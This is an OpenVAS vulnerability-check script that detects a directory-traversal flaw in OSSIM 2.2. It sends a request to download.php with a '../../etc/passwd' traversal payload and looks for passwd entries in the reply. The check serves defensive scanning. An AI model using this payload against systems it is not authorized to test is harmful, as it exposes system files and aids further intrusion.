###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_ossim_38780.nasl 7463 2010-04-29 11:57:02Z chandra $
#
# OSSIM 'file' Parameter Directory Traversal Vulnerability
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2010 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
 script_id(100542);
 script_bugtraq_id(38780);
 script_version ("1.0-$Revision: 7463 $");
 script_tag(name:"risk_factor", value:"Medium");

 script_name("OSSIM 'file' Parameter Directory Traversal Vulnerability");

desc = "Overview:
OSSIM is prone to a directory-traversal vulnerability because it fails
to sufficiently sanitize user-supplied input data.

Exploiting the issue may allow an attacker to obtain sensitive
information that could aid in further attacks.

OSSIM 2.2 is affected; other versions may also be vulnerable.

Solution:
The vendor has released an update to address this issue. Please see
the references for more information.

References:
http://www.securityfocus.com/bid/38780
http://www.alienvault.com/community.php?section=News
http://www.cybsec.com/vuln/cybsec_advisory_2010_0306_ossim2_2_arbitrary_file_download.pdf
http://ossim.net/

Risk factor : Medium";

 script_description(desc);
 script_summary("Determine if OSSIM is prone to a directory-traversal vulnerability");
 script_category(ACT_ATTACK);
 script_family("Web application abuses");
 script_copyright("This script is Copyright (C) 2010 Greenbone Networks GmbH");
 script_dependencies("gb_ossim_web_detect.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("global_settings.inc");
   
port = get_http_port(default:80);

if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);

if(!ossim = get_kb_item(string("www/", port, "/ossim")))exit(0);
if(!matches = eregmatch(string:ossim, pattern:"^(.+) under (/.*)$"))exit(0);
if(isnull(matches[2]))exit(0);

dir = matches[2];

url = string(dir,"/repository/download.php?file=../../../../../../../../etc/passwd&name=passwd.txt"); 
req = http_get(item:url, port:port);
buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);  
if( buf == NULL )continue;

if(egrep(pattern: "root:.*:0:[01]:.*", string: buf, icase: TRUE)) {
     
  security_warning(port:port);
  exit(0);

}

exit(0);

